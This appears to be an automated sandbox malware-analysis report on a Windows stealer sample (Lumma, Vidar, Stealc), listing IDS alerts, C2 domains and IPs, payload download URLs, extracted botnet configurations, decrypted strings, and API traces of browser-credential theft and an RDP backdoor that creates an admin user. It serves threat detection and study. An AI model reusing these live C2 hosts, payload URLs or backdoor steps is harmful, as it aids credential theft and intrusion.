Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-27T01:49:51.658945+0200	2056165	1	Domain Observed Used for C2 Detected	192.168.2.8	49737	172.67.132.32	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (offensivedzvju .shop in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-27T01:49:53.593903+0200	2056161	1	Domain Observed Used for C2 Detected	192.168.2.8	49740	188.114.96.3	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (reinforcenh .shop in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-27T01:49:58.665197+0200	2056151	1	Domain Observed Used for C2 Detected	192.168.2.8	49749	104.21.77.130	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (stogeneratmns .shop in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-27T01:49:57.713031+0200	2056153	1	Domain Observed Used for C2 Detected	192.168.2.8	49748	188.114.97.3	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (vozmeatillu .shop in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-27T01:49:54.540911+0200	2056159	1	Domain Observed Used for C2 Detected	192.168.2.8	49742	188.114.96.3	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (wallkedsleeoi .shop in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-27T01:49:50.505332+0200	2056177	1	Domain Observed Used for C2 Detected	192.168.2.8	49736	104.21.36.139	443	TCP

ET MALWARE Vidar Stealer Form Exfil

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-27T01:49:57.777652+0200	2054495	1	A Network Trojan was detected	192.168.2.8	49747	45.132.206.251	80	TCP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (drawzhotdog .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-27T01:49:55.121784+0200	2056156	1	Domain Observed Used for C2 Detected	192.168.2.8	63771	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fragnantbui .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-27T01:49:56.244657+0200	2056154	1	Domain Observed Used for C2 Detected	192.168.2.8	54463	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (ghostreedmnu .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-27T01:49:52.089727+0200	2056162	1	Domain Observed Used for C2 Detected	192.168.2.8	60496	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (gutterydhowi .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-27T01:49:51.172573+0200	2056164	1	Domain Observed Used for C2 Detected	192.168.2.8	59567	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (offensivedzvju .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-27T01:49:53.080733+0200	2056160	1	Domain Observed Used for C2 Detected	192.168.2.8	64811	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (reinforcenh .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-27T01:49:58.150216+0200	2056150	1	Domain Observed Used for C2 Detected	192.168.2.8	61357	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (stogeneratmns .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-27T01:49:57.210013+0200	2056152	1	Domain Observed Used for C2 Detected	192.168.2.8	65460	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (vozmeatillu .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-27T01:49:54.056407+0200	2056158	1	Domain Observed Used for C2 Detected	192.168.2.8	50316	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (wallkedsleeoi .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-27T01:49:49.903557+0200	2056176	1	Domain Observed Used for C2 Detected	192.168.2.8	63899	1.1.1.1	53	UDP

ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-27T01:49:17.837719+0200	2044247	1	Malware Command and Control Activity Detected	5.75.211.162	443	192.168.2.8	49714	TCP
2024-09-27T01:50:30.837912+0200	2044247	1	Malware Command and Control Activity Detected	5.75.211.162	443	192.168.2.8	49759	TCP

ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-27T01:49:19.181248+0200	2051831	1	Malware Command and Control Activity Detected	5.75.211.162	443	192.168.2.8	49715	TCP
2024-09-27T01:50:32.445597+0200	2051831	1	Malware Command and Control Activity Detected	5.75.211.162	443	192.168.2.8	49760	TCP

ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-27T01:49:19.181021+0200	2049087	1	A Network Trojan was detected	192.168.2.8	49715	5.75.211.162	443	TCP

ETPRO EXPLOIT Adobe EMF File Memory Corrpution Vulnerability Inbound (CVE-2017-3123)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-27T01:49:53.483133+0200	2827449	1	Attempted User Privilege Gain	147.45.44.104	80	192.168.2.8	49734	TCP

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-27T01:50:35.700224+0200	2803305	3	Unknown Traffic	192.168.2.8	49763	104.26.12.205	80	TCP

ETPRO MALWARE Common Downloader Header Pattern UHCa

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-27T01:49:48.876875+0200	2803270	2	Potentially Bad Traffic	192.168.2.8	49734	147.45.44.104	80	TCP
2024-09-27T01:49:51.289711+0200	2803270	2	Potentially Bad Traffic	192.168.2.8	49734	147.45.44.104	80	TCP
2024-09-27T01:49:53.482571+0200	2803270	2	Potentially Bad Traffic	192.168.2.8	49734	147.45.44.104	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: https://steamcommunity.com/profiles/76561199724331900	URL Reputation: Label: malware
Source: https://steamcommunity.com/profiles/76561199724331900/inventory/	URL Reputation: Label: malware
Source: https://5.75.211.162/ramData	Avira URL Cloud: Label: malware
Source: https://5.75.211.162/sqlp.dllw	Avira URL Cloud: Label: malware
Source: https://reinforcenh.shop/api	Avira URL Cloud: Label: malware
Source: stogeneratmns.shop	Avira URL Cloud: Label: malware
Source: https://5.75.211.162/vcruntime140.dll	Avira URL Cloud: Label: malware
Source: wallkedsleeoi.shop	Avira URL Cloud: Label: malware
Source: https://fragnantbui.shop/	Avira URL Cloud: Label: malware
Source: http://147.45.44.104/prog/66f5dbaca34ac_lfdnsafnds.exe	Avira URL Cloud: Label: malware
Source: fragnantbui.shop	Avira URL Cloud: Label: malware
Source: offensivedzvju.shop	Avira URL Cloud: Label: malware
Source: https://5.75.211.162/sqlp.dll~	Avira URL Cloud: Label: malware
Source: https://steamcommunity.com/profiles/76561199780418869/inventory/	Avira URL Cloud: Label: malware
Source: http://147.45.44.104/prog/66f5de72d9ebd_rdp.exe	Avira URL Cloud: Label: malware
Source: https://steamcommunity.com/profiles/76561199780418869	Avira URL Cloud: Label: malware
Source: https://offensivedzvju.shop/pi	Avira URL Cloud: Label: malware
Source: http://147.45.44.104/prog/66f5dbaca34ac_lfdnsafnds.exe1kkkk1222150http://147.45.44.104/prog/66f5db9e	Avira URL Cloud: Label: malware
Source: http://147.45.44.104	Avira URL Cloud: Label: malware
Source: http://147.45.44.104/prog/66f5db9e54794_vfkagks.exem-data;	Avira URL Cloud: Label: malware
Source: https://fragnantbui.shop/HDQ	Avira URL Cloud: Label: malware
Source: https://5.75.211.162/softokn3.dll	Avira URL Cloud: Label: malware
Source: http://147.45.44.104/prog/66f5dbaca34ac_lfdnsafnds.exeata;	Avira URL Cloud: Label: malware
Source: https://stogeneratmns.shop/api	Avira URL Cloud: Label: malware
Source: https://5.75.211.162/gz	Avira URL Cloud: Label: malware
Source: https://ghostreedmnu.shop/api	Avira URL Cloud: Label: malware
Source: https://5.75.211.162/	Avira URL Cloud: Label: malware
Source: https://5.75.211.162/j9	Avira URL Cloud: Label: malware
Source: reinforcenh.shop	Avira URL Cloud: Label: malware
Source: https://5.75.211.162/mozglue.dll	Avira URL Cloud: Label: malware
Source: https://steamcommunity.com/profiles/76561199780418869/badges	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\66f5de72d9ebd_rdp[1].exe	Avira: detection malicious, Label: HEUR/AGEN.1311769
Source: C:\ProgramData\JKEHIIJJEC.exe	Avira: detection malicious, Label: HEUR/AGEN.1311769

Found malware configuration

Source: 00000000.00000002.1436795595.0000000003AF5000.00000004.00000800.00020000.00000000.sdmp	Malware Configuration Extractor: Vidar {"C2 url": ["https://steamcommunity.com/profiles/76561199780418869"], "Botnet": "6c8ce6f422a1d9cf34f23d1c2168e754"}
Source: 12.2.RegAsm.exe.400000.0.raw.unpack	Malware Configuration Extractor: LummaC {"C2 url": ["drawzhotdog.shop", "reinforcenh.shop", "stogeneratmns.shop", "fragnantbui.shop", "ghostreedmnu.shop", "wallkedsleeoi.shop", "offensivedzvju.shop", "gutterydhowi.shop", "vozmeatillu.shop"], "Build id": "H8NgCl--"}

Multi AV Scanner detection for dropped file

Source: C:\Program Files\RDP Wrapper\rdpwrap.dll	ReversingLabs: Detection: 54%
Source: C:\ProgramData\EBAAFCAFCB.exe	ReversingLabs: Detection: 43%
Source: C:\ProgramData\KECGDBFCBK.exe	ReversingLabs: Detection: 42%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\66f5db9e54794_vfkagks[1].exe	ReversingLabs: Detection: 42%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\66f5dbaca34ac_lfdnsafnds[1].exe	ReversingLabs: Detection: 43%
Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe	ReversingLabs: Detection: 47%

Multi AV Scanner detection for submitted file

Source: file.exe

ReversingLabs: Detection: 42%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\66f5de72d9ebd_rdp[1].exe	Joe Sandbox ML: detected
Source: C:\ProgramData\JKEHIIJJEC.exe	Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 0000000C.00000002.2162685267.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: reinforcenh.shop
Source: 0000000C.00000002.2162685267.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: stogeneratmns.shop
Source: 0000000C.00000002.2162685267.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: fragnantbui.shop
Source: 0000000C.00000002.2162685267.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: drawzhotdog.shop
Source: 0000000C.00000002.2162685267.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: vozmeatillu.shop
Source: 0000000C.00000002.2162685267.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: offensivedzvju.shop
Source: 0000000C.00000002.2162685267.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: ghostreedmnu.shop
Source: 0000000C.00000002.2162685267.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: gutterydhowi.shop
Source: 0000000C.00000002.2162685267.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: wallkedsleeoi.shop
Source: 0000000C.00000002.2162685267.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 0000000C.00000002.2162685267.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: TeslaBrowser/5.5
Source: 0000000C.00000002.2162685267.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: - Screen Resoluton:
Source: 0000000C.00000002.2162685267.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: - Physical Installed Memory:
Source: 0000000C.00000002.2162685267.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: Workgroup: -
Source: 0000000C.00000002.2162685267.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: H8NgCl--

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_004080A1 CryptUnprotectData,LocalAlloc,LocalFree,	3_2_004080A1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00408048 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,	3_2_00408048
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00411E5D CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA,	3_2_00411E5D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040A7D8 _memset,lstrlenA,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,_memmove,lstrcatA,PK11_FreeSlot,lstrcatA,	3_2_0040A7D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C756C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer,	3_2_6C756C80

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe	Directory created: C:\Program Files\RDP Wrapper
Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe	Directory created: C:\Program Files\RDP Wrapper\rdpwrap.ini
Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe	Directory created: C:\Program Files\RDP Wrapper\rdpwrap.dll

Source: unknown	HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.8:49710 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 5.75.211.162:443 -> 192.168.2.8:49711 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.36.139:443 -> 192.168.2.8:49736 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.132.32:443 -> 192.168.2.8:49737 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:49739 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:49740 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:49742 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.58.182:443 -> 192.168.2.8:49744 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:49746 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:49748 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.77.130:443 -> 192.168.2.8:49749 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.8:49750 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.2.13:443 -> 192.168.2.8:49752 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.8:49755 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 5.75.211.162:443 -> 192.168.2.8:49756 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:49765 version: TLS 1.2

Source: file.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: freebl3.pdb source: RegAsm.exe, 00000003.00000002.2177878116.0000000020801000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mozglue.pdbP source: RegAsm.exe, 00000003.00000002.2188004628.0000000026773000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmp
Source:	Binary string: freebl3.pdbp source: RegAsm.exe, 00000003.00000002.2177878116.0000000020801000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: nss3.pdb@ source: RegAsm.exe, 00000003.00000002.2223847487.000000003E53F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2291783107.000000006C97F000.00000002.00000001.01000000.00000008.sdmp, nss3.dll.3.dr
Source:	Binary string: c:\rje\tg\vlt\obj\Release\ojc.pdb source: 66f5dbaca34ac_lfdnsafnds[1].exe.3.dr, EBAAFCAFCB.exe.3.dr
Source:	Binary string: rdpclip.pdbH source: RDPWInst.exe, 00000017.00000000.2112949311.0000000000450000.00000002.00000001.01000000.0000000F.sdmp, RDPWInst.exe.16.dr
Source:	Binary string: costura.costura.pdb.compressedlB source: JKEHIIJJEC.exe, 00000010.00000002.2514195438.0000000002481000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: <>c__DisplayClass0_0<GenerateRandomPassword>b__0<>u__1IEnumerable`1Task`1TaskAwaiter`10xb11a1<>u__2Func`2Dictionary`2<Main>d__5get_UTF8<Module><Main>Q2xpZW50QUFBUkRQSW5zdGFsbGVyQUFBUHJvZ3JhbUFBQXNzZW1ibHlMb2FkZXJBUkRQQ3JlYXRvcl9Qcm9jZXNzZWRCeUZvZHlBSystem.IOGetPublicIP_Costuracostura.metadatamscorlibSystem.Collections.GenericDiscoverDeviceAsyncDownloadFileTaskAsyncCreatePortMapAsyncReadLoadAddisAttachedInterlockedcostura.costura.pdb.compressedcostura.costura.dll.compressedcostura.system.diagnostics.diagnosticsource.dll.compressedcostura.open.nat.dll.compressedget_ConnectedAwaitUnsafeOnCompletedget_IsCompletedSystem.Collections.SpecializedNewGuidReadToEndExecuteCommandcommandFindGenerateRandomPasswordpasswordNatDeviceCancellationTokenSourcesourceset_ModePaddingModeCompressionModeCipherModeRangeExchangenullCacheInvokeEnumerableIDisposableget_AsyncWaitHandleDownloadFileget_Nameget_MachineNamefullNameGetAdminGroupNameuserNameGetNamerequestedAssemblyNameusernameWaitOneCombineIAsyncStateMachineSetStateMachinestateMachineValueTypeSystem.CorecultureDisposeCreate<>1__stateWriteCompilerGeneratedAttributeDebuggableAttributeAsyncStateMachineAttributeTargetFrameworkAttributeDebuggerHiddenAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeset_UseShellExecuteByteTryGetValueadd_AssemblyResolveRDPCreator.exeSystem.Threadingset_PaddingEncodingSystem.Runtime.VersioningMappingFromBase64StringDownloadStringCultureToStringGetStringSubstringAttachComputeHashzipPathGetTempPathpathget_LengthlengthEndsWithUriAsyncCallbacknullCacheLockTransformFinalBlockget_TaskProtocolzipUrlserverUrlurlReadStreamLoadStreamGetManifestResourceStreamDeflateStreamMemoryStreamstreamset_ItemSystemSymmetricAlgorithmHashAlgorithmRandomrandomICryptoTransformTimeSpanIsPortOpenget_ChildrenRDPCreator.cMainAppDomainget_CurrentDomainFodyVersionSystem.IO.CompressiondestinationSystem.GlobalizationSystem.ReflectionNameValueCollectionset_PositionSetExceptionStringComparisonusernamePatternpatternCopyToget_CultureInfoProcessStartInfoAddUserToAdminGroupAddUserToRemoteDesktopGroupSystem.LinqClearStreamReaderTextReaderMD5CryptoServiceProviderTripleDESCryptoServiceProviderAsyncTaskMethodBuilder<>t__buildersenderResolveEventHandlerPortMapperInstallRDPWrapperNatDiscovererCheckForRDPUserCreateAdminUserTaskAwaiterGetAwaiterEnterRDPCreator.ctor.cctorMonitorCreateDecryptorSystem.DiagnosticsFromMillisecondsSystem.Runtime.CompilerServicesSystem.DirectoryServicesReadFromEmbeddedResourcesDebuggingModesGetAssembliesDirectoryEntriesresourceNamessymbolNamesassemblyNamesGetBytesUploadValuesget_FlagsAssemblyNameFlagsResolveEventArgsargsSystem.Threading.TasksSendCredentialsEqualsContainsget_CharsProcessSystem.Net.SocketsExistsOpen.NatConcatObjectSelectBeginConnectSystem.NetWaitForExitIAsyncResultGetResultSetResultToLowerInvariantWebClientTcpClientEnvironmentStartConvertRDPPortportget_StandardOutputset_RedirectStandardOutputExecuteCommandWithOutputMoveNextSystem.Textset_CreateNoWindowToArrayset_KeyContainsKeySy
Source:	Binary string: costura.costura.pdb.compressed source: JKEHIIJJEC.exe, 00000010.00000000.2081801810.00000000000A2000.00000002.00000001.01000000.0000000C.sdmp, 66f5de72d9ebd_rdp[1].exe.3.dr, JKEHIIJJEC.exe.3.dr
Source:	Binary string: rdpclip.pdbJ source: RDPWInst.exe, 00000017.00000000.2112949311.0000000000450000.00000002.00000001.01000000.0000000F.sdmp, RDPWInst.exe.16.dr
Source:	Binary string: softokn3.pdb@ source: RegAsm.exe, 00000003.00000002.2207871234.0000000032659000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr
Source:	Binary string: RfxVmt.pdb source: JKEHIIJJEC.exe, 00000010.00000002.2514195438.000000000254A000.00000004.00000800.00020000.00000000.sdmp, RDPWInst.exe, 00000017.00000000.2112949311.0000000000450000.00000002.00000001.01000000.0000000F.sdmp, RDPWInst.exe.16.dr, rfxvmt.dll.23.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: RegAsm.exe, 00000003.00000002.2215547025.00000000385CC000.00000004.00000020.00020000.00000000.sdmp, vcruntime140.dll.3.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: RegAsm.exe, 00000003.00000002.2198205124.000000002C6E6000.00000004.00000020.00020000.00000000.sdmp, msvcp140.dll.3.dr
Source:	Binary string: nss3.pdb source: RegAsm.exe, 00000003.00000002.2223847487.000000003E53F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2291783107.000000006C97F000.00000002.00000001.01000000.00000008.sdmp, nss3.dll.3.dr
Source:	Binary string: rdpclip.pdb source: RDPWInst.exe, 00000017.00000000.2112949311.0000000000450000.00000002.00000001.01000000.0000000F.sdmp, RDPWInst.exe.16.dr
Source:	Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: RegAsm.exe, 00000003.00000002.2143411229.000000001A1F2000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2162837314.0000000020168000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2537504701.00000000222CB000.00000002.00001000.00020000.00000000.sdmp
Source:	Binary string: mozglue.pdb source: RegAsm.exe, 00000003.00000002.2188004628.0000000026773000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmp
Source:	Binary string: RfxVmt.pdbGCTL source: JKEHIIJJEC.exe, 00000010.00000002.2514195438.000000000254A000.00000004.00000800.00020000.00000000.sdmp, RDPWInst.exe, 00000017.00000000.2112949311.0000000000450000.00000002.00000001.01000000.0000000F.sdmp, RDPWInst.exe.16.dr, rfxvmt.dll.23.dr
Source:	Binary string: c:\rje\tg\ps7uj1z\obj\Release\ojc.pdb source: KECGDBFCBK.exe.3.dr
Source:	Binary string: softokn3.pdb source: RegAsm.exe, 00000003.00000002.2207871234.0000000032659000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr
Source:	Binary string: costura.costura.pdb.compressed\|\|\|Costura.pdb\|6C6000A5EAF8579850AB82A89BD6268776EB51AD\|2608 source: JKEHIIJJEC.exe, 00000010.00000000.2081801810.00000000000A2000.00000002.00000001.01000000.0000000C.sdmp, 66f5de72d9ebd_rdp[1].exe.3.dr, JKEHIIJJEC.exe.3.dr
Source:	Binary string: c:\rje\tg\bj\Release\ojc.pdb source: file.exe

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0041543D wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,	3_2_0041543D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00414CC8 wsprintfA,FindFirstFileA,_memset,_memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,_memset,lstrcatA,strtok_s,strtok_s,_memset,lstrcatA,strtok_s,PathMatchSpecA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,strtok_s,strtok_s,FindNextFileA,FindClose,	3_2_00414CC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00409D1C FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	3_2_00409D1C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040D5C6 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	3_2_0040D5C6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040B5DF FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	3_2_0040B5DF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00401D80 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,FindNextFileA,FindClose,FindNextFileA,FindClose,	3_2_00401D80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040BF4D FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,	3_2_0040BF4D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00415FD1 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,	3_2_00415FD1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040B93F FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	3_2_0040B93F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00415B0B GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,	3_2_00415B0B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040CD37 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,FindNextFileA,FindClose,	3_2_0040CD37

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_00415142 GetLogicalDriveStringsA,_memset,GetDriveTypeA,lstrcpyA,lstrcpyA,lstrcpyA,lstrlenA,

3_2_00415142

